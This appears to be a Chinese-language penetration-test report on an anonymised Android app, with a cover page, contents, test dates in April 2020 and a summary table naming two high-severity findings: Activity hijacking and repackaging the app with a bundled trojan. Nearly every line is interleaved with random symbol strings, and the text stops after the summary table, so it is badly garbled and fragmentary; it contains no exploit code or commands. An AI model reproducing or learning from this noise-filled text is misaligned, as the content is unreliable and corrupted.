9 N: _7 n7 C7 j |5 X
; m2 b, m9 B7 x' o4 |' t
- E/ Z m3 C& \% _
& B* Y' M; j4 s& z1 |" L
7 {0 K5 }0 E0 c3 P4 m5 K
& B- j' ^9 _: T. P- r. p* G) ]! [
2 u. j0 u0 h0 f2 j7 o( c5 M2 q$ v/ n0 ^ [
. [/ ~3 A! ]3 z( A. T& c6 w4 K2 }2 ^9 @ L% z- y& M
$ A) z9 Y$ J: w2 z4 r9 m; y) ^( _- Z, E+ L2 o6 Y
文档编号:
9 u3 [5 B8 h. ?! `3 U3 P9 v {# M' K) }: Z
9 d, }2 L' B) L: W, e$ i6 |
* k9 A) f' b% k! T5 K
6 W# f2 d8 l" Z6 x$ g. @& o( K: H
. U, f* B) R* j& @7 l. m/ q
& i5 s w( j8 t* y3 f+ N* U2 E0 T
# k! L! L1 F. S9 S: Z/ |
& n0 @/ q6 B1 O ) l8 Q* ~; F/ ~ T1 F" ~2 Z
, G% V" n, I. g2 R
! o" B3 _# L6 s) @; W, u! H. i+ l
+ p1 N1 J% [$ C c$ x9 O6 ]% f
$ V9 H7 j. [6 W
2 t3 K" T: m# J. c5 d/ d4 O
6 e$ n Y5 y( V9 Q3 d. L9 [ J' |$ J! a2 O8 K
: }/ ~. d. X, |# s* U; A
- R) Z; {4 }3 Z, M5 c
5 W' P6 U' p5 Y3 J* o. h# D5 ], m. }
9 @( z2 x, f( k3 {# F/ s
$ I* `6 D0 i k2 c
- b, P: q! h, f+ u6 k$ h" u
* t+ q! ]; M3 e: R% x% n. }3 t9 V
; R7 O) c5 _8 l8 Z9 ^: r
3 l# i& A5 Y* W, e3 `2 m& t% e* M2 q& q# {5 c
% k1 k" L/ R ^+ `- i; f/ O+ m5 k ?( }8 }
/ i+ q5 X1 D, O) t4 J! o
T" T( B/ h& p9 A/ ~0 C* W1 |
/ O2 V, N- Z$ o4 o( X
( j$ b* D7 H [7 U4 o' h6 p& O8 e # i- t7 Q9 S3 s1 y4 O# v; k& s
) y P6 q; y$ \
某某某APP渗透测试
7 J$ p5 q6 ]2 e- z X4 X5 h7 |! S4 Y% w7 S7 {' s
$ n- T/ w2 c1 a
6 F2 ?/ H- ^& T8 t7 O
! m9 V) Q- Z9 p3 T, V* p, s$ g. s% x+ [8 A a9 h/ ^8 y/ E
1 I9 X( w: T, }3 c
9 a0 h9 ~ W0 s! F7 ]
* f5 v' R1 {0 u5 B0 [( z
+ K6 Z, c2 x9 R; ~' }
- R+ S' z6 B1 P* }: t3 |3 }
4 N8 T: t4 K0 @) r1 X 2 K# P: I6 x7 t
7 c$ Z* \5 F" n8 z9 @( p$ V0 T
5 d+ M" Y! l" ^9 J0 D/ v
3 ]( |( Q; A( n/ q' }9 @. z9 n
" P5 @$ l) B& }0 j7 E# [
& }% X6 q1 Z d! ~% _: h4 k8 Q+ J3 X
4 ]4 C3 ~) V& U \1 c3 L4 ~
3 s+ B+ H7 v) b8 u; X
, @0 O* T5 R+ k, H, e/ k; @2 p! G9 k2 Z
3 ]6 t1 M1 F, h, M, ?
1 J7 |( N3 W" M& O2 ~( e) a# R) Q1 L. u
9 o+ E4 @) m' \5 P* ^% r3 z0 n4 U- ~! X! V- f/ y
5 a- R I# f3 s& w
; e; }# I. u. c0 K
1 A% j" M7 m# {: y, r
& l0 { q7 T$ ]+ A& u2 f- d1 L2 @ 技 术 报 告
9 q+ u* M6 c0 s2 @6 r! a. l$ f6 V/ D' X% s% x8 u, A
0 t6 L. U9 ` W; n8 y0 w O
4 P* C1 ?9 x" b8 J% z: f" R! j9 c7 B
; S* X5 P' n. {+ {# ~1 N) {! Y0 z8 q- c; s
! e+ S1 w, h4 d0 a
6 u, J1 A: X- d7 E5 l0 L! W h* k
; m3 O. n3 H9 ]0 p
: @5 {' a @1 @4 G6 B
/ {* _# s' }. v- ]2 r e
8 g8 `: x3 A7 _! ^: L 2 A( V. E. H. k7 n- _: \; w$ n
2 [+ W7 D) {8 n+ Q. P4 j
+ T% N! f" v. r7 \. t ^
8 [6 x* V8 D* n2 o8 Z+ n
% \6 t/ \- B9 U6 R- s. e' M+ e2 P. u; d5 t B" g
1 S0 Q6 [6 L) W
X' |( _5 G; i) T' ?! w, g( q
4 u1 X/ p; T* I/ x! z# `' ?4 v, n# ^& Q0 t3 a( [$ X
' `( o* D# a# S7 w9 B( Y% |; r$ _1 f) y' a1 X% D) [: o7 m9 f
3 ~& ^" Z- C0 p8 S# W
+ n3 s' R4 Q G& E6 J
4 x3 o, c4 d0 p
- n$ Z8 x& Q# W& P4 n9 L 8 D9 @ P% t% S
% U# w @* Y u9 ~0 N4 x
" Z7 `1 s; H- H7 N8 z; [9 k6 ?; N- \' ]0 t4 ~
( z: _5 ?! p6 ^7 }/ I3 Y- V6 B7 @- A5 l+ E" D& d0 Z& U& p
8 }, g5 J: P% h
, I, T3 x) M" a, \7 v; L0 y
8 A1 ^5 |+ V$ Y9 A1 S4 o3 Q
- |3 O6 g# F5 C/ D; Q/ K
. ]. f2 X4 k+ _ L
Z& Z% A& B3 d7 D( O( g/ c! O
2 V* b' V+ {3 R1 T) z
. s. @! o+ S( U, W0 e- Z$ G7 q- ]
" `, O7 z; z! w4 c0 t8 T1 W1 W. {' J8 y' ?2 X. R: G
6 j7 c: c o4 C0 X( Z0 b
8 X7 S* O/ l8 Y7 H9 Z
% A! | Q/ m$ d, ^$ L: c3 S
0 G* m k& B5 e: A+ y" L2 _ 2 K6 D' d+ q9 r
3 E; l" a) ? O4 G- G1 h) W: z8 | ~
6 l1 Y# V. T' N% s9 \. K% ~0 U( L0 D3 p e. O3 g
9 x3 w2 g: B0 d+ O4 u1 M
W1 k. F% q+ K) r- l2 L% s0 z. K5 c
1 `5 Z6 P& a# T9 v/ _* Z, Z5 L
6 q. [4 D( q8 J O O7 f
: @3 i; z/ `2 S0 F) @+ _/ f
W! K. j; a, Y# ]
* h. d$ X& C" C: z
& v9 j% ]5 \& l" p9 x" F# a8 p! m
+ ?8 X; o7 d/ s: m9 x2 T8 Z8 s+ Z
# A2 _6 {5 k5 I5 ]( @/ ]
9 A3 E; O# S) x# w
: E; _4 o) r! `' ~1 g: O
7 z. G" e3 j" T( X3 A; b% b# q0 e6 o2 e; W7 E+ H
3 V8 P" r1 h9 z; {) T2 a5 M
" H; l( E$ v7 X5 G1 W
+ K. J3 E, t# C; a2 J( S- Y3 D4 u& y! q& a# @7 L) Y1 S( V: L3 V# e5 I
' K* o$ |! a: ?/ ]. o. j$ Q4 v0 U0 ^
& Q7 h7 K. j5 H0 s3 B
) J- K+ d% B/ [( F; z
% w) J5 a' n7 q3 D c% \6 W) E1 F- v! T
/ A7 S9 G7 P9 t$ O3 m8 Z
! ]6 P6 g" H7 V: m j# K 3 z* J1 w1 {) @' Q; `; K6 E
9 ?0 X: |# X. @( o6 n) ^0 t" f
9 f1 {8 z% g" V( Z2 q( B7 `
4 c& s3 I, R8 c6 Q; P0 w9 W
! d1 k* a, E8 Y/ k5 l' q! K! H: P9 o3 f
7 m9 m6 s1 E; ]# u" v- p; Y
I {9 w( r; F! |7 ]. @; L! J( c ?
1 }! N0 G7 t# n6 V
# O2 u8 I- t/ g- ^% |
2 K) h$ r& v* v. L
* @; O# H- R9 z; T0 r5 x! h4 S
! S# T3 L& M& r$ p( x Q2 S+ B" n, @4 d. s3 ~
% s% o4 c4 `2 E
7 v9 `- l6 T5 C3 u! A& a9 V5 D
+ H" Y5 U, N' z; F3 S8 P1 `+ G
. R7 ^& ]. L8 B 3 e$ j1 R4 k3 f3 {/ {
9 w6 [. n, S- t" u5 k
" \2 u( v3 w3 y" w/ Z' Z7 f! ~+ ~- F" X9 z8 i7 T- \. ^9 v9 c
* P4 d3 U6 `4 R8 `( Y! q/ v$ s6 D
! [" J. F5 v1 ^% i' I2 x, Z/ e
) A" G! A; Q8 d! |' ~# K! {/ r& R0 _: d/ L+ N
4 p" C' w& H6 R' e; F- k; L
6 O' I6 [* X" X3 P3 ?( u. b. q5 U2 D
3 i- R! W3 R" B: U' c- Z8 O [% @( o M8 L* E5 X
, u3 H0 i0 n; _- u1 q, ?9 ^ i
7 n- [8 F/ p6 S# z# f. m7 w/ s+ H
% t+ S p/ \8 G3 _( T: x
% n% F, |/ p0 F7 x0 d+ _! n4 H# r. s; C ) {) ?. Y2 [' |/ Q# L2 q: j
8 g2 Y0 b# @! u* g+ D+ I9 {) |( r 二〇二〇年 ; R+ @- @" T' t. X
1 R8 g; C6 e& I! L" z2 X9 ?
2 F- J; m* G7 d0 ?4 j! O: c
" ^* H: l/ F& f1 k" H5 S% G9 E/ f
! P' q" |; y. l; T# E: [
+ M' ^2 J; C5 s$ c) G1 [+ z# q ?* x
' T. f- K+ ^ j$ T
- Q/ X. L! T' d7 s; }" Z; n , J' z; i. A* G/ z/ l
+ {4 Y% B/ m) [: U8 n i* k4 [1 M
. w r K/ z" o7 J
' V; F0 j2 P3 l! K$ B( M1 d
, r- S" ~+ e) x* d! ?" ]7 P
4 F4 Z+ Z7 w( N- L5 ]+ y
. L. q! ]5 T1 F/ X
* L" O! U% R# r& D- S) R
+ l9 {. a7 \$ h% b" U/ f% J1 S1 d
* N& n0 ^- w8 P3 Q7 O3 n# |0 ]
, |; I" u9 Y6 ~+ }6 [. O' c4 X& b% s$ o& a) F% @ J- \
$ \7 j0 z2 I4 f# P8 }' x/ ]
+ w/ A. N" l1 G* \8 s: S! d 目 录 2 j7 B& x g* F J& ^7 q
6 }& j. T) m' M
# U: g" x5 ~ ?
) V- J! y' q* G8 a$ j0 s; H9 ~
+ U1 _: F _ v/ U3 z/ u3 d
0 h9 X9 T3 u6 \2 H! D
& W3 p. O7 R5 G v) ]" |3 \' F1 a: d3 u. Q* e9 g" X+ u
0 W: }+ V: V6 U: k! W# }3 o2 M# d! G q! @9 M* ^
, S7 q) n: J0 a6 N1 j. R1 c. d' |- P1 w6 M' w% L
% ~* r a0 Y, z4 ^4 p* D9 Y
0 K# i! r1 [! Z. y" ?& I 1 概述... 3 # F* a0 M0 H/ B' j o: h' T9 b8 I
* n" w2 {! Y2 d# ^/ [
9 O& s, K$ p) N& U5 O5 u% I, j- A! _! i
: V5 x, ^$ {& M; [
+ c+ h6 ~& m' c8 e% O
1 |+ K+ q% o$ ?4 d+ h/ U4 i 1.2测试时间... 3 ! W) |6 }2 l% @, s
4 E/ ^* Q3 a9 O9 ~8 g3 b# h% v
( w+ L# P, b9 b6 M# z: a
0 W; ~6 r3 k1 S. }) C: S
' P' S* H9 X) T* k
( t8 j7 r. A- G 1.3测试对象... 3
: a% E: p' f# m+ h1 f$ h/ a% x# D }) q
" U& |& [5 C" D5 M& J, C
4 F3 S: }, @- E1 H+ F4 e8 q" _
9 u u. z& F& K" P$ q& Q0 x; O2 D" i
1.4测试结果... 3
, H, m/ n! t, R) p: i+ M0 _$ P9 D% u* t1 R
9 A- n% T! p, I! k" p' w1 t% C4 C
; L _9 N7 E6 F! K3 v" a
% `6 A: F1 [6 g5 W. R
3 ^$ d4 k4 ?3 H% }: k2 G! t
2 检测结果... 4 $ w+ K- s I; } H' R5 A
% P& O" u4 e( R& W
: F8 X2 W" p _! m9 B
, C; b" Z( v1 j0 G. w7 o
/ f* ]" |) Z; h
+ o* O9 M+ e3 s0 }; v 2.1 某某某... 4 8 v) L. D d" w' Y
' n* e0 J2 I7 V) b X1 `6 j" G# U/ p% O% f
: k' x4 t! C: `' g2 J& U! Z. Q. V: c1 V" k/ @' N
9 [7 |1 }0 [0 {5 T: V: s& r/ D4 {
H3 ~& f. o7 ~5 Y0 {( n6 ^. @
2.1.1检测目标... 4
C% Q/ \7 u. D6 f3 t+ K& I3 t6 [: Q" \; V* V! }
; o$ R$ J2 O: _1 ?+ v
& C0 {# k% b, W4 m& W $ D1 m( I N, P
* G" s, ?8 e/ T3 D- p4 g5 E6 {0 H 2.1.2检测结果... 4 / C3 \8 K( F9 ~* X
9 F" V! D1 c) j1 e% S! Q5 n6 k7 W# J. b
% {8 a3 E6 O% X2 E
' L, o9 N {: s0 G1 F: P* ]
; j7 V2 t. m5 I7 O% w) f( w) U$ D6 m, b* @, k+ a. g
2.1.2.1. 4
: E3 |* C( @* O* F7 g: r' c
8 x2 \4 @" Z5 `. V
7 }+ a! o) K t0 u1 e; v/ X& l- V! Y E5 k
0 m! O7 S; n+ x( T
, f1 o7 V8 d! m" E
2.1.2.2. 6
1 l, x6 a* I8 O
1 Y$ ?& g" c2 d. A% c U
- A( q3 S* R# z
, ^# P* J3 ^& Q5 m' T8 c/ j, C
- I! ~% t% d$ q6 X$ C1 {8 C+ ?: p( K6 ?! ^, p8 O8 j
9 M: f# i* w6 V% @$ t8 T, o8 z" N* [; n9 R" c' I2 j; t
1 @, W. L; N0 b$ }' n) A
' u0 F' }+ J* B) E1 B% ~ D8 u! J$ a8 y8 o7 l |. P
1 {4 z$ L) E) x# A, f! ^9 ]
( s- T" C4 B, |* i4 x* o: w* S' Y* N& o; Y% R
1 Y, M u1 T$ A
/ n% f: [3 g( I1 z2 o6 }( }
. i# q' Y3 h) a* K
4 I# D- b9 c( P: i * b4 t' P: l, W9 g) h; ]( T
& w5 l# O$ L. L: d4 D( E1 A 1 概述 2 l; E2 m' J; j7 e6 U# H9 v
# K6 Y% V2 ^4 a# I) U
" A* j# m- t; I. i# S# G2 K1 W: J$ }+ g+ X1 L
6 v! u5 N$ U, X; D. W% H m0 _$ e. ^# A2 q. r* p
1.2测试时间
. U- F) Y) B8 a: K
& `. G' }: i9 G: j4 ]& j
7 `3 G4 Y/ u% A# @6 G$ d
- W* ^( U& B/ {+ `! T0 W
: L7 ^4 L, q1 }0 K4 X* W$ w% F: t5 i9 L, ^- T, b
- j6 X3 R0 [/ e1 R; Z
* o! B* J t. o, e9 X3 k' E 5 ]5 e8 i, B9 P7 t' L7 d9 O
" f" n5 M9 a1 i& {
9 u8 g- x6 {$ D. o1 `8 c: ?: t9 U" c. C3 K. l* h9 }
# X- D4 X9 _' M/ E2 B) l! Z8 Z7 C" S+ X- m9 S
渗透测试时间 - Q5 a1 @7 m8 d7 t9 X6 \2 r- U( \
$ {, R! e. h0 B1 f
/ y* }- V& i2 t, {& D% ~2 q" k2 k) ~3 {6 z2 t& a# Q
|
6 S6 n3 K% a/ F/ \ _& o+ w9 \
! w. V' [, o: E7 w0 d+ i
$ e9 z w n- d$ c) i n! d* _; X. u$ I
" ?6 n0 W P) |: ?
# R' S; j& D+ A, M$ d _$ \
# q1 ^5 n8 E$ n/ S4 b" C* k
0 H4 R3 h9 n! Y3 i8 N2 A% u D* X, ~
' J" Y% R9 e8 {5 }" v # }# S% {! b* @3 b* E( Y7 g& q
+ S1 E; f* [& M
起始时间 % ^; z8 C' i( T6 p$ x
5 x d; r. _2 s
" t# o( W7 p$ W/ X9 N) R
6 ~; E- X, M9 m5 W2 g% G | G0 y' q% x3 C: Y @) B/ x
, v3 P- S* h( a( j+ I* m# K
4 W! \3 f) @" u! F' o* n. ^: Y6 z
0 R# x! F u/ R% G& r& M5 d1 b( J$ c4 C! |! D
2020年4月6日 , R' h! c3 e# \9 ?% R
) R; s( `4 c. u5 u; B1 W, {
- L- h, K0 X6 D/ i! g+ p F: }% C. t1 f
|
. ~0 S8 y: D8 u) M1 A, V9 Y1 i$ Q+ r; a5 L7 a9 M
# C% ~, r9 t# K: t
5 u* W0 L0 j \. A
# Z8 e% i4 ~$ l1 ~, `8 s8 {& P3 N, t. N3 ? ~+ u8 d* m& K6 f
2 P G% H3 ^3 I
. r( I/ ^) a. @. l& u3 `' Q0 Z1 ]* b( ?: @8 {
6 L8 \; j8 V3 y( `6 k( L
$ K1 X$ `2 w: s. U% ?* C* c" j
结束时间
+ D! Z) N+ K2 z4 K% ^, |
* s5 Q. l; i- z# k
b# Q( |; _ ^ _/ l5 A3 t
, `; |( G& U- x* S | / i# _ ]! c) z$ @
& l8 w0 ] C- s: C1 r
4 l! \' v6 g8 M( E8 q& y3 [* d, e; L# D; O+ ^
8 R4 f; W3 F/ c( d
% w4 D& N! G9 q, } 2020年4月9日 ' s- Y" g' [7 y8 ~; o
W# ]1 E0 F- H8 Q- b) S6 r
* ^3 u7 z5 |" s2 M/ J- y7 o+ D5 N( r. D# K9 K+ e4 S5 U8 D' V
| 1 {2 y' O" e# I% r( g) M
: h4 W6 o4 M9 C
8 L: I; [9 S3 k2 c% u+ t+ {
, `$ O8 G. x8 i9 Y) g
% W7 d# k/ E+ w- G# H& I1 ], X* m- o- _
& k1 E# x6 b t! L8 C- d, {2 w7 _
( h. V/ A; A# u; }( P: N5 P# ] $ E% K: k' T" L( F, l2 |
) J4 k6 Q7 @4 F4 S# z
1.3测试对象 8 g1 z; o" @. v& a6 s* z
& Q" l9 b; a% e) D$ u& G( y
9 s6 l; M* d4 M! z+ Z" f5 y4 W" G
) k7 i/ y, j+ r+ d
& d3 [& a2 l- a: f- T1 `7 w8 {# w4 p6 d
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
: @$ s2 v4 b; H- R
/ Q7 p$ R* W o/ e5 z( Y
* J9 {% b9 L+ c- K. z5 k+ z$ c# l4 f* d t& \1 o, P
' V/ t4 N$ t9 R, `# |! X3 d6 R
" l6 @7 T0 V$ M0 d0 e 表1-1 检测对象
4 ]. ?# N& ]2 p/ }+ Q; T+ j+ J& l. t& e& J k! `" t
6 g( L. j5 o7 r4 }# m
( \" m5 F Y% L8 e& |
' c( X1 F: o6 J; O1 d- |
, V6 A9 `5 @: @: H 5 j2 t+ s6 r7 f; |' |5 }3 X
3 Q* X) k8 s0 ]' ]9 L, Z, _
4 _2 `. C X" ~2 X# w3 \2 l0 k, S2 {+ L8 `0 }0 e
% E+ h6 |7 b" u( y8 c& T' ^
( d# H# ~' t) R, W
3 r! B2 p- Q( r8 h% p! W
8 |) ]0 A) [% r 序号 4 [& k- s* v+ t! u$ U+ }; W) ]
) ]6 z/ d8 f7 y: W/ a: P
( ^7 x( s1 ?/ N- \- g# h2 W7 J( X
$ A( \! u* n( ?9 F( |7 y2 m* x |
# m) f% w1 U3 j! M
S# m. k* b4 P& O! l
" b |7 \$ ]) f( Z2 h7 a" N+ Y1 f, P8 z7 @" t _; v
) E0 S# k: P U, J6 U. p
, R2 U8 j9 y8 v g% C5 u! @: w
测试对象 5 v3 U$ W4 P! m# @
P6 r& H$ L: G# f) m4 W3 ]$ y* ~
; B0 d: Z! v- i% E% H
% x) L, F% l" f7 r1 L" H
|
) g9 Y2 R3 X. @" V$ c7 a: w: P: z R8 X w) p1 n, Y
2 O$ W" K8 \: z
7 ~& |9 o9 l7 f% }+ S
+ s' H. `& `* W$ c3 X' \ h
7 W& c" U3 o/ b7 q$ k1 B0 @ 测试地址
% k- R4 ?. S- i$ F- Y4 F$ U8 H; a7 R7 P; |
* ^' [9 W4 Z0 T& a7 R
# a4 a/ Y5 ^% N7 z% d, x( i |
* j. U: I5 W0 z. j/ g; v6 Q* k/ Z3 n
% k1 ^+ o" @1 ]$ P
# z8 j: E, S$ e% [( C( ?# X" J
- e/ u7 A5 a( s
! G4 p3 j' N5 H/ n2 w' N 安全漏洞 + r8 s& F( H4 a
' i+ l0 D$ j( p* |2 P" M- g ) D& S' U( f- \
5 ^# a! Q" y' c) Z! A! s |
7 W) [6 a- L( r x& Y
9 @4 D1 t/ V( D* H/ B
, e- a1 s) f7 ]' p
" W* o- H+ c/ x- {
. s( j/ |2 l; m1 j1 T, {
6 b4 { J: s7 _) U % r6 L, v' {' v" ]/ b g8 t$ }
8 b6 n/ ^* s1 |5 d% \. ? ; n# w# k' Q. A1 r, ]
4 E6 a5 k6 O" o }2 C2 d% U 1 / A% \' n- B2 o( u
5 n0 U/ ~1 d, k- G & Y6 o' w% b; [6 j0 F. V# h
: v+ R/ T) Z6 \
| 7 }. k: j5 a' Q s" A
) S+ B5 N, a: W2 A2 e( f# b
R( I. E* E7 B/ @+ k ?3 G% K2 G3 }& [8 [
9 h1 z( [3 P4 K3 V! j, f
! E/ v8 ]! y- H: b
某某某安卓APP & U* Z; ^ ~! R H3 ^0 Q' ]: w
2 m( b) Q$ I9 v' @
' [$ \- \ o7 y, V+ N1 w
* o& [0 `) q6 C& b5 `, t4 V |
2 u, E3 ` D: V$ | F& S) Q4 _; t) s- [4 H+ z/ I p
3 {0 J k" G% a- Z
+ {0 y( U! V* [" U6 B
/ E! `- H! Z! U# {0 O1 \' i* v7 X7 K8 t3 Q, l" S- [
% a- W, F9 y/ z: q
/ d' }; B0 \% E1 O( ]0 H0 g
! h3 c+ [. [+ @3 r5 B! r, v
5 w( c# i4 s; y) s
| # x/ a1 o8 h7 V& W7 \
8 u5 I* _8 e+ {) q" J! N3 Y! R L1 x
. v+ R5 G! q \: `8 G: s
9 U/ ^! Y1 [# \& `9 a
# n/ m( c4 T1 j3 a" L$ m, h) [. }
2 ?" E: ~( J3 E! r 2
- C! `2 R: s. ^, C# n2 |* D' x/ e' U
; [- U {& Z6 t , ?- G0 Y4 m4 q% \1 T
1 K1 L! B4 z1 Q" e' e, S y, M; g |
5 M# N: h% t% D; D* D0 x6 a! d- V" J- J
) Y/ J+ u" \% _: C5 b$ O
0 |2 M$ `4 J( Z
- c( j4 K; r* n) U: e g# p! [7 G' u9 A6 I( P
" g" T, z3 h) l
0 z, A; ^0 W5 ]6 }
2 q1 f% ` H% H+ y
4 u* v0 |5 U) n2 N' A+ g 1.4测试结果 7 V" ]1 S7 V. L+ \- ~
8 y) Y- p5 L6 M/ D9 V: p" T! X
6 B+ I, V. l! q1 a$ P$ }
5 i# @" K, C8 B+ l4 v
2 U' ? ^: @* R3 }( `# j! l" t$ h8 q
* m' ^% |% B" D [& ~; d 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: * X K, i4 n, w0 c% {
/ M! T$ Z8 p1 s8 }
7 T2 f/ m+ e: G; G* E4 o
2 I7 X. g" b6 _
( ^4 h4 Z" ?9 m4 f% ~: t$ y2 V) {) |* X3 _! t5 c" u0 ^
6 t2 o( W7 H8 j- r8 C& V8 i; L
- L9 p( B1 s: E+ v
' z+ c+ W' a& j$ k! _
3 C$ h% N& U4 M4 D0 R- g
8 C9 \* i* K0 i+ i% |2 u6 M
7 E5 F$ m1 Q2 \+ `( I
6 C. J9 N3 K. ?! R/ W e
2 \4 F2 b; g6 k+ t : o- @6 P1 e% k) G5 f) I
2 B7 ~) B/ v- d3 w% ^
! Y* V, Y9 x& `" ?4 |% o
- T) c3 z5 t1 _0 t
9 U5 M5 m* P, E6 L* L$ D% L. a( K6 f* y: |6 y
L5 J" p. ?( ]9 I/ A* d
( |. J+ S! V3 |6 j" Y% A% k 序号 - U: T! X/ P1 [% [& A, ?! G
6 o4 l) C4 W3 S( l4 q# \# W $ F0 n( ^8 }$ M& K1 u" W' k
$ E! N: V- L. w- m7 I9 e |
9 l4 t6 \$ p% L. h- V
# h' t3 T$ R7 U' ] 5 d; L; D9 |; K: M
; L$ t, M3 r! D: n% j* a" @
6 Q' b, E" x: E: H- l8 A( g" K/ r: t4 ], w
系统名称
$ `" c5 ^" E1 I; ~. v; ?( n0 T b- n9 g/ U* ~ W4 k; w6 o7 N
$ Y: F& j9 M P- M6 @* J M5 o$ } {0 r
| / R% b, n v9 M! H" l: D
; j) V4 g. k" m% \+ }
2 }: C. r+ z* d% D2 b
" Q/ L; P: y e( b. h+ b
; L1 y7 L. u+ _ O5 V
+ q( P9 n) Z Q 漏洞名称 c% {8 w9 G6 ?; E' f3 ]
' F5 f0 b, f0 Q) {$ l+ K) f9 h7 W
$ c+ D, B+ J; E2 B0 F
/ X; c4 F; K; Z( d3 F
| 1 C! T: c* X: m/ |. G
( v3 `- A$ X( Z# _! v* Q! i
% N4 j4 T0 \1 S1 o. ?+ o: U# p/ A: i6 ]$ U4 N
G+ o/ }* y. I- v% ^
& Y6 E L& P \) [ 漏洞危害
' K6 g1 D$ F: g6 L1 E3 T0 v/ H7 E1 k9 v: q0 {2 P7 ~; s
0 L4 E! O+ q2 @, k8 |# N
4 t8 ]2 {# ^" {) S2 z3 W$ N | 6 S! \( A2 a C5 A) ]- g( S
* l9 N) m- \; M+ ]: x
! Q, B9 o0 I3 r2 G) n) |
9 ?3 ^2 M1 [* T. M* z. Q 3 h, o; S9 G0 x
# t, W, A/ L* S" J8 h
修复结果
0 {2 s/ d) e5 j. X$ C! f, ^$ G1 N+ j! L0 [" @0 r' d4 K
8 ?% H' L; }7 G1 ]! Z
1 I* i1 |3 E! ^6 W |
4 f$ {, c+ l4 l f- I, o* \& N: M4 c% R& A- Q ?% {$ n0 a
3 {8 Y# l4 y! U- x! l1 s; O( p* O! X
5 t+ B* ]& L C8 b
8 C- M; W) Q" q& w4 t
: j& N7 g" P/ B8 _5 m ; _$ e8 L9 X6 H; _& g! [9 v
n5 n' U+ `- g' m( b5 `0 P( n
. U2 K$ q- h; r1 S
1 Q+ |2 A3 s7 a4 b& A2 V 1 . P; p" M! P2 e8 X9 T6 u
* W" C$ s% t$ |! g+ m. v
5 U. [9 x4 y8 ]. b0 {/ Z$ Q; J4 L/ m# t, c% b! m9 o
|
# v7 }" s/ t# w! K% @
; d6 _6 J9 ]% m# h7 B* Q
2 U A- l% _4 K3 R. X$ |( T
8 b) P1 ~ U$ S# e
1 b" Z2 ]! q# ]; `3 @
- X; f; |6 J' L$ l) }+ L 某某某某某某APP
/ s! H' z% V+ O. c
# H; S) U) C4 U6 _& }2 h* `0 z1 z- F 2 c( A, W: c3 T7 H) G2 L
" E2 H# R; ` E" e$ [
| , |) q1 s/ [0 s# q' E
7 u1 v! K( |5 b; H- e
! r3 q( w5 \: S; ~& n0 ?. ?9 J
. U ^) m+ e- x0 [: T6 A , X" `1 ]7 A/ `+ P) g7 z3 w
2 i* ]( x9 }# }7 d9 n5 H
Activity 劫持 8 G( o+ L) X7 k4 z
! ^! Z; O/ M# d# Z
; N' [2 x: S. x6 |( J- V$ r6 b, u& @) E& ?9 ]% O
$ Q# T& a$ i1 w) `! d7 n- h, q
7 g& J5 \7 n+ r6 j- Q7 d 1 v- H6 J& n- T! u7 g3 `
$ H9 X }' q% `. [* u( K9 U& L7 d 8 B7 }& S& X0 E2 E8 ]; _1 m& ~
) k. H9 b& }7 w) E+ k. Z% l8 } |
3 E' i% `3 Q5 [- O I$ Y* H
6 m5 A0 b" Q& |) j, j5 J 8 R8 w/ O/ Y% I# M V( f! H& A
+ g% y# i- L# ^4 Y ) U) f- x; {, M$ q7 x2 @
3 C! c% J4 D" y- M: x 高
3 ^6 {" v. @& j& q% H# E' X/ T! g# _
4 u1 e7 k' T! A) {! ?
/ D, h+ I* s! q# ]% V R- W) c' ^& w7 ~0 h2 o, ], U" g
|
/ S' s* g- Z3 n! G N: R7 J2 \# u
# T9 t0 j/ }4 Y0 b8 B, ]- n
4 t- J# B5 N3 _2 n6 y0 t% x8 ?
, s4 e w8 R- U1 S) \+ w. ?5 X7 ^, q# P; c) o0 m
$ N2 `9 T6 c" v9 ~
& O3 U7 b7 z4 P
, w$ L. k. r& |0 I- O3 O7 |& [ v/ i5 |0 \& r: [% _/ E3 h: F
|
8 m3 R) V8 {1 y, o/ ^* r
" E* F4 `( Q5 V
# L* _! m$ h3 T0 |6 s
) b# G' G. A F+ U2 m8 @- O
' G2 L! c3 K& u( {7 f8 c: x9 V( ]2 Y3 L" U+ M/ s
) E8 Z/ V" P' f' F
) ?* J. c! v0 D; k/ ] $ Q& r) Q/ {( g# U6 {: V* U
) z0 ~7 H% |; _% c7 }& Y 2 " }& A) z& d% J: |- r( p
3 m: D9 n# B% x7 Y5 y ( N: x& Q% L2 L* `! ~& @& `. A# d
1 a$ @" M) } d; ?0 m) [ | 4 Y- D5 G) h' q ]1 ~
- ^; ~$ X7 q! h4 ~4 ~
7 L* _0 t, c% v. \
4 s3 [! u3 w [, f) f $ g; @1 f) I5 `1 S- M( q( [% H( N
$ W5 q0 N$ A) Q: _: o6 T9 i: z$ T1 q
某某某某某某APP 6 G/ Y6 ]0 b/ _ R5 \3 w
3 e$ \3 X/ l( P" b& X& I: p
: f: o4 |2 H# Q4 P
" h, e3 W' M- F% P) o, ^. V. r4 a- V* d | 7 n0 [/ g7 u) K! ~" V6 a
/ R& f# s' G, W& @ 7 Z. D2 ^) |9 C
9 z' m% I+ @& X" s. P. @7 x# h# y 4 i! I- ^! ~ A
k) H1 u) O* Z5 |4 J 反编译二次打包捆绑木马、篡改APP代码
" P$ j: I& }( O( p* q& B" G% O. ~7 a; l5 h1 W
# {! I* k9 h, p$ l$ T7 A2 o' B+ ]8 o2 Q& N/ o( r% @
|
' Q4 e9 [! J) I/ P7 e/ K
" y. l0 A) D1 o: A( ?+ T
7 } s$ m4 q- ~& w2 k
2 Y" i* t5 ?. S; V! ^) S# Z
5 m7 @5 t) O$ P' u2 {8 K: c2 H- G1 A" h
高
: t- k. G' G7 u( Q! ?6 b4 ~& |/ v7 A% c! N+ q }) }" N6 u
+ F: }1 o7 _: s. Y$ k/ \
- f' P# d, X6 C, W! e# u |
/ @ }- E5 }2 k4 Q# Y6 f$ r. A, G4 _+ b7 |8 _7 r! T/ r
8 x& C# b0 C( K2 N; ~' @' O* u6 V" }
1 ^5 T* k/ a/ C) I" P4 X* g
! U6 L) }) w% n$ i: W4 H
+ b( z1 ~& E S d* Q" R& g ~. u: j; M, ?* w1 x" W( r' j
, @! {7 A" N' b$ |/ N, |
9 N/ j6 e3 I9 ^2 ]
2 n+ y- x2 T7 t+ w! G" ]2 y1 M |
6 c% C3 p9 p- F, o
" g$ e. a, G; B4 W- L
. y' T# I) s& q7 A5 A" z4 c' S8 @0 |3 Q$ z4 S$ a8 h% b# @
/ N9 G" j& o( a: O+ {! Q+ y
